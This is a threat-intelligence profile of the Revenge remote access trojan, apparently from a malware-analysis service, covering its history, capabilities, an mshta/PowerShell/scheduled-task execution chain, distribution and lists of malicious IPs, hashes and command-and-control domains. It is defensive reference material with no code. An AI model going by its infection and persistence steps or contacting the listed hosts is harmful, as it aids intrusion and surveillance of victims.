Revenge

Revenge was one of the most popular remote access trojans to be used in 2019 when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy after the victims.

Type
Trojan
Origin
Unknown
First seen
1 January, 2016
Last seen
18 February, 2020
Global rank
30
Week rank
18
Month rank
28
IOCs
836

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans which means that it is usually used by the attackers to control infected PCs remotely or spy on the users by monitoring keystrokes and even computer surroundings through the remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat at the present day with a big spike in popularity monitored in 2019, when the malware was observed targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods, robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with a nick Napoleon – an Arabic speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that didn’t offer much, if any, code obfuscation and was mainly used by other Arabic speaking cybercriminals. Despite the simplicity of the malware, at the time, only one out of 54 of VirusTotal scanners could pick up the malicious nature of the Revenge code, which confused the researchers bearing in mind the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release– providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

After two months since the initial release, a new version v0.2 was issued by the author, on a more popular hacking forum, this time with more features, but still offered completely free of charge. Since then Revenge has evolved even further and today, it offers cybercriminals a wide range of capabilities including remote files and registry alterations on an infected machine, access to memory, processes and services as well as access to connected devices such as keyboards, webcams and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

Core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed in the HTML of a custom blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds.

process graph of the revenge trojan execution Figure 1: Displays the lifecycle of Revenge in a visual form. A graph generated by ANY.RUN

text report of the revenge analysis Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

Sometimes the first steps of Revenge trojan execution may vary depending on how it made its way into a victim's computer. The most common form of initial infiltration vector is by the use of Mshta.exe for downloading the payload or for direct execution from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes - cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list, in the given example processes from Microsoft Office packet were targeted. Powershell.exe is being launched to download the main payload. In turn, schtasks.exe is launched in a way to generate a scheduled task which provides Revenge persistence in the infected system. After all these steps, the malware is ready to complete commands from C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest firmware. One should not disable native Windows security features, regularly update the OS and adhere to the best security practices of staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and never enabling macros in Microsoft Office if prompted to do so by a file downloaded from a suspicious email.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways, some of which are potentially more effective than others. For example, Revenge is known to infect PCs from malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in the Microsoft Office file that was downloaded and launched by the potential victim, Revenge will use macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by malware. Just click on the "ATT&CK™ MATRIX " button.

Revenge MITRE ATT&CK MATRIX techniques Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It has begun it’s lifespan as a simplistic malware with functionality and without anti-analysis features but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is not only due to its robust feature-set, but also ready availability since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like to ANY.RUN.

IOCs

IP addresses
192.169.69.25
18.223.41.243
23.249.164.109
3.17.202.129
3.19.3.150
193.161.193.99
79.134.225.105
79.134.225.72
79.134.225.73
72.35.115.91
137.74.12.153
216.170.126.36
176.136.148.107
208.167.245.254
193.56.28.101
108.28.75.120
207.180.232.56
91.233.116.105
77.37.222.1
196.64.86.68
Hashes
fcb765c909218846b224ea0caf467953b7e6f44a90390341a3b943f2d402b80e
1d9b74a717b4ebd64ce12ad84467223ed24140f7c29792283559b6d4b9159ccb
3cc3a3e9cd47901e19952ad2fb809fd8f4c5647447f16967f9ab7f68249fe3e9
4a17bf8b7b6aa24d2a49818f28b0f8cfb7d8f3229d731fefd5b95abfc5c293f9
4802f449dc01615962051c628c454a4a8f6c4eda8b2f717ae38f0d88358bdfec
eadd4aa417c3f5bf23ff0eee7e4a69d2035c44e08e4e656befa6a53cf7890b35
a721837305ababfd4406763e699286cd4ddec8e42bc1f377edfbf05259452256
2020280ab143490fa93e2875e29852085c861a3c7ea8459e04364776a6c61f7e
63047f17419bf17909d8fd1845b014b5f67c9f9f8f84e18f0303e66090b2f331
aaa9d97a502b411f7c52f780cb32c4510309ea4880668ed80fc62b4c98827ca1
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
8faee7d114e24b7bc762ed857d6087a7975f5c5fc2b11bc48b0c452eab7a055a
10beebbc4ac6f351b78acbe38c95e861489153dccd1bdaf13b4d00c910b43d06
efaee6c17a014a1034cb1624071369291bc1945be965914cb85ae819cab0af8b
52aafffcae6e83756733ee48dc7c7caee74eae90a7a2cf3f272c241ee59b8058
6aa5314b5fdf34dbc81056ab7bb8cce6a8ce3d73c69ae6c66871b9cd9d6e41a7
8592f2d843140a8331c0cb45f038970c43e0f32aaac5a372e2c9e45e963dc7c8
c4e0a5db5fb05495206586965848c99535afd09f25e64c9bab093b73f4b354c9
535b5dbc060a2b7d8db2fa83c0a368e3a9641b10b32c644e7db020c2a9176f34
3da1bf5613ef6ae9a390d414a4c2453fa0aa3cfff3deb57e47c3238241896be8
Domains
soucdtevoceumcuzao.duckdns.org
bylgay.hopto.org
sciano.duckdns.org
money1234.duckdns.org
thuocnam.tk
majul.com
m-onetrading-jp.com
krupskaya.com
isns.net
elx01.knas.systems
ververdenuevo.duckdns.org
coodyz.site
fucktoto.duckdns.org
0.tpc.ngrok.io
pounds.ngrok.io
39fb22c1.ngrok.io
paypatupdatesnfosei.ngrok.io
ef3711d7.ngrok.io
24648040.ngrok.io
2eb415d9.ngrok.io

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More
Dridex screenshot
Dridex
dridex trojan banker
Dridex is a very evasive and technically complex banking Trojan. Despite being based on a relatively old malware code, it was substantially updated over the years and became capable of using very effective infiltration techniques that make this malware especially dangerous.
Read More